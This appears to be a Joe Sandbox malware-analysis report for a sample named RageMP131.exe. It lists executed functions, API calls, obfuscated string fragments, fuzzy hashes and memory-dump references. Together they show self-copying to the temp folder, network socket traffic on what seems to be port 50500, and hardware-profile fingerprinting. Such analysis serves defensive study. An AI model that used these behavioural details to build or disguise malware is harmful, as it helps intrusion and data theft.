Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 1690ac0c5ddd6fe17520225602ae27e5423afffa3b4fdac2012e764ea11db7b6
Instruction ID: a75f93de3875298d22115d15551af6a263d648909bd50545750087f98b4e367c
Opcode Fuzzy Hash: 1690ac0c5ddd6fe17520225602ae27e5423afffa3b4fdac2012e764ea11db7b6
Instruction Fuzzy Hash: A6E09277A10318BBD700A7A9EC46E9EBBECDE845A2B140566F600D3290E971E9448AB4

Function 00B56014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B5603C
GetProcAddress.KERNEL32(00000000,00B56064), ref: 00B5604F

Strings

kernel32.dll, xrefs: 00B5603B

Memory Dump Source

Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 9290ef91f53a5468f8a5a159c07ea34bed3e5ae9df0a3c3f4a5c2b3c4a2341a7
Instruction ID: a27b6590ab1ac039dd6a8db3403e1b317f28183a0aa21340d256232c0eb12faa
Opcode Fuzzy Hash: 9290ef91f53a5468f8a5a159c07ea34bed3e5ae9df0a3c3f4a5c2b3c4a2341a7
Instruction Fuzzy Hash: 50F0F6B11402898FDF70CE64CC84BDE37E4EB15711F9005AAED09CB281DB3486098B14

Analysis Process: RageMP131.exePID: 4228, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	0%
Total number of Nodes:	259
Total number of Limit Nodes:	25

Executed Functions

Function 00821044 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?), ref: 008211FA
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00821223

Strings

Kern, xrefs: 008210F4
Crea, xrefs: 00821169
WinE, xrefs: 00821110
catA, xrefs: 008211AF
athA, xrefs: 00821199
GetM, xrefs: 008210B6
.dll, xrefs: 00821102
el32, xrefs: 008210FB
GetT, xrefs: 00821188
odul, xrefs: 0082122D
WwKLWFk.exe, xrefs: 008211FD, 00821200
dleA, xrefs: 008210D0
Writ, xrefs: 00821148
Clos, xrefs: 00821129
lstr, xrefs: 008211A7

Memory Dump Source

Source File: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: CreateFilePathTemp
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 1031868398-1035807574
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 3075cfa525de2dac800afc0fb3ac393af3226dd00b7612f6e2224f353ea8c955
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 46611874D01229DBCF24CF94E888AADF7B4FF64315F2592AAD605AB200C3709ED1CB95

Function 04E200D8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b51dd48258456589420fd8c5e80596941399f0597e76b0af73547b045d8da6dc
Instruction ID: 685f9140f8bbf2b85bcf19878be535e6d0421ac7c90e5bf3f9cf5fdc233876c1
Opcode Fuzzy Hash: b51dd48258456589420fd8c5e80596941399f0597e76b0af73547b045d8da6dc
Instruction Fuzzy Hash: 7D21B0E724C130ACF20285516B54AF66B2EF3C6330331A917FA47D4986E2892A8E7131

Function 0028EC20 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 265
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(0000033C,0000FFFF,00001006,?,00000008), ref: 0028ECC6
recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
recv.WS2_32(00000000,?,00000008), ref: 0028EE0C

Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8A
Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC42
Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D

recv.WS2_32(?,00000004,00000008), ref: 0028F033
Sleep.KERNELBASE(00000001), ref: 0028F09E
Sleep.KERNELBASE(00000064), ref: 0028F0AC
__Mtx_unlock.LIBCPMT ref: 0028F211

Strings

50500, xrefs: 0028EC75
O, xrefs: 0028EC7A

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
String ID: 50500$O
API String ID: 2930922264-581959401
Opcode ID: ddfed0382b041169c167ac837b55ba4cdea574968ae53a242cba0ff2b24bbffc
Instruction ID: 1fc210379494b6ab33b4d97901b34d4d04006f1a7de710aecaa7c106d0d515e8
Opcode Fuzzy Hash: ddfed0382b041169c167ac837b55ba4cdea574968ae53a242cba0ff2b24bbffc
Instruction Fuzzy Hash: 0DB1DE31D11259CFEB21EFA8CC81BADBBB5FF56310F248219E444AB2D6D7B06994CB50

Function 0028E060 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 333
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00374438,00000000,00000000,-003A65B0), ref: 0028E3A6

Strings

50500, xrefs: 0028EC75
ta:, xrefs: 0028F1CA
;:, xrefs: 0028E525
\;:, xrefs: 0028EB85
O, xrefs: 0028EC7A
Ws2_32.dll, xrefs: 0028E37D
131, xrefs: 0028F2C8

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Send
String ID: 131$50500$Ws2_32.dll$\;:$ta:$;:$O
API String ID: 121738739-3323569928
Opcode ID: fecb6ec7590042f329d492d11ca54f624bb721b829d6978ebfb05d504757f4f3
Instruction ID: 9e43fff9f75cada7380a55552b3dc70dd56389b92bd8d9e383f446399dd318c0
Opcode Fuzzy Hash: fecb6ec7590042f329d492d11ca54f624bb721b829d6978ebfb05d504757f4f3
Instruction Fuzzy Hash: 94D1EE30E14249DFDF14EFA8CC55BADBBF5AF02310F694258D855AB2C2E7709886CB91

Function 0028DB60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0028DB8A
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC42
closesocket.WS2_32(00000000), ref: 0028DC4D

Strings

50500, xrefs: 0028DBE8

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500
API String ID: 3098855095-2230786414
Opcode ID: 00f5683ff68a194f8f122a84d0c006985bbd798e0cc34ee4b86dad181838ef47
Instruction ID: 6a8bd0c29f5f9e54301da03b1fafdd35652c504dd64ced641834988f4d619c07
Opcode Fuzzy Hash: 00f5683ff68a194f8f122a84d0c006985bbd798e0cc34ee4b86dad181838ef47
Instruction Fuzzy Hash: 1F31D0765153016BC6209F289C89B6BB7E4EB89724F115F1EF8A8A32D0D370991887A2

Function 04E1082A Relevance: 1.8, APIs: 1, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f44af7dcb7d6cf9b9245ba24cf6e8ab07a473a1bea746b99977617cfae1eda2f
Instruction ID: 32f7abbda54d3e3e89f78887941334d749802681f14518ae26bf9f92da8cf05f
Opcode Fuzzy Hash: f44af7dcb7d6cf9b9245ba24cf6e8ab07a473a1bea746b99977617cfae1eda2f
Instruction Fuzzy Hash: 835123F73CD214BDF14285915B60AF62A6EE7C7330730A462F407D6E62F2942EC96471

Function 04E1089A Relevance: 1.8, APIs: 1, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28de2bd788922d9a2c8f0c099718b21ade2f6754805080a383b1e21aa2c45691
Instruction ID: 36bf8d46e031de4fc805e46f47fbd3a6da6a6d0234c9fc2459b57acddd4c8dd6
Opcode Fuzzy Hash: 28de2bd788922d9a2c8f0c099718b21ade2f6754805080a383b1e21aa2c45691
Instruction Fuzzy Hash: F05120F73CD214BCF142C6915B60AF66A6EE7C7330730A463F4079AE62F2946AC96471

Function 04E10809 Relevance: 1.8, APIs: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 88f906fc994121196160430ef0a88620cf1b743718c5a6ee6371186ca41911d0
Instruction ID: b11d409a2dfb9b13c753eacac651e5c4c68153e0f97f5715ec4f49e524cdc984
Opcode Fuzzy Hash: 88f906fc994121196160430ef0a88620cf1b743718c5a6ee6371186ca41911d0
Instruction Fuzzy Hash: 57510DF73CD210BDF14286855B60AF62A6EE7C7330730A462F40B96E62F2946AC97531

Function 04E10802 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: cd3536ee92f32f35ffac3d900ebc129bcb4de26301ff9e7560ec6e9423edf371
Instruction ID: 33e6cbdeaf29f635c2329ec2beeee69cca364f7f835afa8a6ce0393d06c04ec4
Opcode Fuzzy Hash: cd3536ee92f32f35ffac3d900ebc129bcb4de26301ff9e7560ec6e9423edf371
Instruction Fuzzy Hash: F251EFF73CD214FDF14286855B60AF62A6EE7C7330730A462F40B96E62F2946AC97471

Function 04E108B6 Relevance: 1.8, APIs: 1, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec79d8d5581459b19fc749cafe0c603d61dd745b48af954a6b211efb5017aa3
Instruction ID: 5fdd456633a1a5298aa8ec206ed979f1ee03d0b3aff7693d1c8626ff5ae496a0
Opcode Fuzzy Hash: 8ec79d8d5581459b19fc749cafe0c603d61dd745b48af954a6b211efb5017aa3
Instruction Fuzzy Hash: 8F51FFF73CD214ACF14285955B60EF62A6EE7CB334730A4A3F407D6E62F2846AC96431

Function 04E10854 Relevance: 1.8, APIs: 1, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81fe3c748e2be91df68a34d5a624059c6e44a02231f4da2725f1cca534bd211
Instruction ID: ddc691422b16719d57c33c51ce84371dae979b6188dfcbee4d49ff4d30d247bf
Opcode Fuzzy Hash: c81fe3c748e2be91df68a34d5a624059c6e44a02231f4da2725f1cca534bd211
Instruction Fuzzy Hash: F251FFF73CD214BDF142C5815B60EF62A6EE7C7330730A462F4079AE62F2946AC96471

Function 04E1087A Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2aadf5a7dabefaa4accb38b0df94c6b2e161941b914dce61835a993771bed5c5
Instruction ID: 681cba2a622cd4a1a300711ad6bc96a62e74c5bd8f1b337c9ef2d6a8523608f4
Opcode Fuzzy Hash: 2aadf5a7dabefaa4accb38b0df94c6b2e161941b914dce61835a993771bed5c5
Instruction Fuzzy Hash: 0B51FEF73CD214BDF14285915B60EF62A6EE7C7334730A462F40796E62F2942EC96431

Function 04E10900 Relevance: 1.7, APIs: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 5c6e728e5c5016ae173864ded15932e4ddd2f7d71a33aeb6a0d4100c9d373acb
Instruction ID: 0fd19f5fc929ca66cb01e11233c657a1c9fd22dbcc9004bb613882a51cee39cb
Opcode Fuzzy Hash: 5c6e728e5c5016ae173864ded15932e4ddd2f7d71a33aeb6a0d4100c9d373acb
Instruction Fuzzy Hash: 3141D0F73CD115BDF14285955B60EF66A6EE7C7334730A0A2B40BD5E62F2842AC96431

Function 04E10934 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 293a8977663817612133d3a12d14bac8e4d0d02b6daf0e600a9dd6fc95acc408
Instruction ID: f81ee82c5bf798f7be729bbdce014eb5a985991e9e8f0f8ab88cb7169b957e4e
Opcode Fuzzy Hash: 293a8977663817612133d3a12d14bac8e4d0d02b6daf0e600a9dd6fc95acc408
Instruction Fuzzy Hash: 0241EFF73CD115ADF14285915B60EF66AAEE7C7334730A4A3F40B95E62F2842AC96421

Function 04E109CF Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 05e796a48a3a14ad95834b6a1557e919541633a2e54f9ac4288d169cfd52144c
Instruction ID: 3216fa25d3e25426567bcddcfa8a86b9d3049f04330542e1d4ae0b05925be83a
Opcode Fuzzy Hash: 05e796a48a3a14ad95834b6a1557e919541633a2e54f9ac4288d169cfd52144c
Instruction Fuzzy Hash: B2411FF73CD114BDF10285811B60EF66A6EE7C7334B30A0A3F40795E62F3842AC92421

Function 04E10945 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2080a2f412b3af1bfa31d3d8ef37619b5da11e3bd01a094eb08161ff0ae1f02b
Instruction ID: 6a23b1d952b71e867647fc299ed95958a1ce0352a5df2651dabbaeff79d3308d
Opcode Fuzzy Hash: 2080a2f412b3af1bfa31d3d8ef37619b5da11e3bd01a094eb08161ff0ae1f02b
Instruction Fuzzy Hash: 054100F73CD115EDF14285911B60EF66AAEE7C7334730A0A2B407A6E62F3842AC97431

Function 04E10968 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 286d7b01e7cd43946adebf3ed4b08c54ba0e13b0ecc47e60596dbc063899d13c
Instruction ID: e648917b09195292ae91edbb5a004f62eb5bb5e0866fb0ed1f959ad9148497f2
Opcode Fuzzy Hash: 286d7b01e7cd43946adebf3ed4b08c54ba0e13b0ecc47e60596dbc063899d13c
Instruction Fuzzy Hash: E24111F73CD115EDF10285515B60EF66A6EE7C7334B30A462B40B96E62F3842AC96432

Function 00362B5C Relevance: 1.7, APIs: 1, Instructions: 198fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00356747,?,00000000,00000000,00000000,?,00000000,?,0034BC71,00356747,00000000,0034BC71,?,?), ref: 00362CE1

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e6ba5b684291c28729d4bcdec7cafd780895db7922f1d2ae0174ce26500bf6ab
Instruction ID: 16b1fef1f77ec205fb3e2e3c1905d935d40d42a614ec55aa8713f2f06a9a3855
Opcode Fuzzy Hash: e6ba5b684291c28729d4bcdec7cafd780895db7922f1d2ae0174ce26500bf6ab
Instruction Fuzzy Hash: 0961C171D00909AEDF13DFA8C884EEFBFB9EF19304F168145E810AB25AD771D9019BA0

Function 04E1099B Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4192e3cd433740c95b173ba099935f6c160ab1208cc6f8baf7a319c03c422a99
Instruction ID: 54c7d0c4c13801f7e44a390d8ddcf755ef1746cc10b4a738249eb00471c158cb
Opcode Fuzzy Hash: 4192e3cd433740c95b173ba099935f6c160ab1208cc6f8baf7a319c03c422a99
Instruction Fuzzy Hash: 2C4133F73CD105EDF20685505760EF62BADEBC7334B30A0A3E407A6D22F3842AC96521

Function 04E1097F Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1fd5153b7f6846b84a700204cb02daef8c8c530b3783716e0b7bf866ebc408c7
Instruction ID: 0e339a0a5215d5a6a64f1b1c90915bec3265c82f3d198478fcc61b69e73444a6
Opcode Fuzzy Hash: 1fd5153b7f6846b84a700204cb02daef8c8c530b3783716e0b7bf866ebc408c7
Instruction Fuzzy Hash: 394100F73CD105EDF20285815B50EF66A6DE7C7334B30A4A7E407A6D62F3946AC96422

